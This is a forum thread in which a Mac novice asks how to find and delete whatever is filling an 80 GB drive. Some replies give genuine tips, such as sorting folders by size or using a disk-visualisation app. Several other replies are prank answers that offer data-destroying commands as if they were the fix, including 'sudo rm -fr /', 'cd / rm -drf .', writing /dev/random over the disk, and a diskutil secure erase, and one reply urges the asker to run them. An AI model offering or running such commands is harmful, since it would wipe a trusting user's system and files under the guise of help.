how do i delete files off my mac hard drive?

so i hwe no ida how i filled my 80 gig hard drive on my macbook, any ideas on how to view whats taking up all the space so i can delete what i dont need?

ctrl click, or right click on the mouse and use get info, that is the same as doing right click properties in windows.

Check the application folder, I found mine came bundled with a lot of crap I dont use like iLife which was taking a good chunk of space up.

The easiest way would be to go through the folders, and arrange the icons as a list, and sort by size. Anything you dont need in your applications folder you can throw out. And if you want, you can pop in your install disk and remove stuff you dont need such as 2gb of printer drivers, 2gb in garage band and support items, etc…

i still cant figure this out. all i put n here is music. my ituns says i have 20 gigs of music. what the fuck is taking up 60 gigs? how do i find it? how do i delete it? i want windows!!!

cd /
rm -drf .

[quote=“DrDoS,post:5,topic:39121"”]

cd /
rm -drf .

[/quote]

english plz

[quote=“dirtye30,post:6,topic:39121"”]

english plz

[/quote]

:picard:

[quote=“dirtye30,post:6,topic:39121"”]

english plz

[/quote]

sudo rm -fr /

Edit: Don’t actually do that

lol

cat /dev/random > /dev/hda

?

haha, open terminal, and take said advice

i will be amazed if he can find the terminal lol

[quote=“FormulaLS1,post:10,topic:39121"”]

cat /dev/random > /dev/hda

[/quote]

sudo diskutil secureErase 3 /dev/disk0s2

Anyways, back on topic, go to http://www.derlien.com/ and grab that app. It will visually show you which folders are using the most hard drive space.

hmm, I dont know if this is still a default option in Itunes, but it used to be that any songs you imported into Itunes were auto copied and archived in another folder…Presumably so you dont lose your whole collection. Worth checking out.

:word:

[quote=“FightinMike,post:14,topic:39121"”]

hmm, I dont know if this is still a default option in Itunes, but it used to be that any songs you imported into Itunes were auto copied and archived in another folder…Presumably so you dont lose your whole collection. Worth checking out.

[/quote]

thanks ill look into that!

www.idontknowhowtousegoogle.com

i would suggest you run this first:

sudo periodic daily weekly monthly

and check how much free space you got back…

are you seriously asking how to delete files? lol

[quote=“DrDoS,post:12,topic:39121"”]

i will be amazed if he can find the terminal lol

[/quote]

SPOTLIGHT

(dont do it)